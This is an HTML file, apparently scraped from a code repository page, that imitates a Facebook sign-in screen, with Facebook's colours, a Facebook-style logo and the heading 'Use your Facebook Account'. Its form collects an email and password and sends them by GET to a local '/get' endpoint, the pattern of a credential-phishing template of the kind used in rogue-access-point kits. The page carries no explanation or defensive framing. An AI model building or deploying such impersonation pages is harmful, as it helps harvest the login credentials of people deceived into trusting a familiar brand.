84 lines
2.0 KiB
HTML
Executable File
84 lines
2.0 KiB
HTML
Executable File
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<style>
|
|
body {
|
|
font-family: Arial, sans-serif;
|
|
background-color: #f2f2f2;
|
|
display: flex;
|
|
justify-content: center;
|
|
align-items: center;
|
|
height: 100vh;
|
|
margin: 0;
|
|
color: #1d2129;
|
|
}
|
|
.login-container {
|
|
width: 350px;
|
|
background-color: white;
|
|
box-shadow: 0px 0px 5px 0px rgba(0,0,0,0.20);
|
|
border-radius: 5px;
|
|
padding: 10px 20px;
|
|
}
|
|
#logo {
|
|
display: block;
|
|
margin: 0 auto;
|
|
margin-bottom: 20px;
|
|
}
|
|
h1 {
|
|
font-size: 28px;
|
|
font-weight: normal;
|
|
margin-bottom: 10px;
|
|
text-align: center;
|
|
}
|
|
h2 {
|
|
font-size: 16px;
|
|
font-weight: normal;
|
|
color: #606770;
|
|
margin-bottom: 20px;
|
|
text-align: center;
|
|
}
|
|
input[type=text], input[type=password] {
|
|
width: 100%;
|
|
padding: 15px;
|
|
margin: 5px 0 10px 0;
|
|
display: inline-block;
|
|
border: 1px solid #ccc;
|
|
box-sizing: border-box;
|
|
border-radius: 5px;
|
|
}
|
|
button {
|
|
background-color: #4267B2;
|
|
color: white;
|
|
padding: 14px 20px;
|
|
margin: 8px 0;
|
|
border: none;
|
|
cursor: pointer;
|
|
width: 100%;
|
|
border-radius: 5px;
|
|
}
|
|
button:hover {
|
|
opacity: 0.8;
|
|
}
|
|
</style>
|
|
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
|
|
</head>
|
|
<body>
|
|
<div class="login-container">
|
|
<svg id="logo" viewBox="0 0 24 24" width="75" height="24" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
|
|
<g>
|
|
<path fill="#1877F2" d="M22 2H2C.9 2 0 2.9 0 4v16c0 1.1.9 2 2 2h9v-7h-3V11h3V9c0-2.8 2.2-5 5-5h3v3h-3c-1.1 0-2 .9-2 2v2h5l-1 3h-4v7h6c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2z"></path>
|
|
</g>
|
|
</svg>
|
|
<form action="/get" method="get">
|
|
<h1>Sign in</h1>
|
|
<h2>Use your Facebook Account</h2>
|
|
<label for="email"><b>Email</b></label>
|
|
<input type="text" placeholder="Enter Email" name="email" required>
|
|
<label for="password"><b>Password</b></label>
|
|
<input type="password" placeholder="Enter Password" name="password" required>
|
|
<button type="submit">Sign in</button>
|
|
</form>
|
|
</div>
|
|
</body>
|
|
</html>
|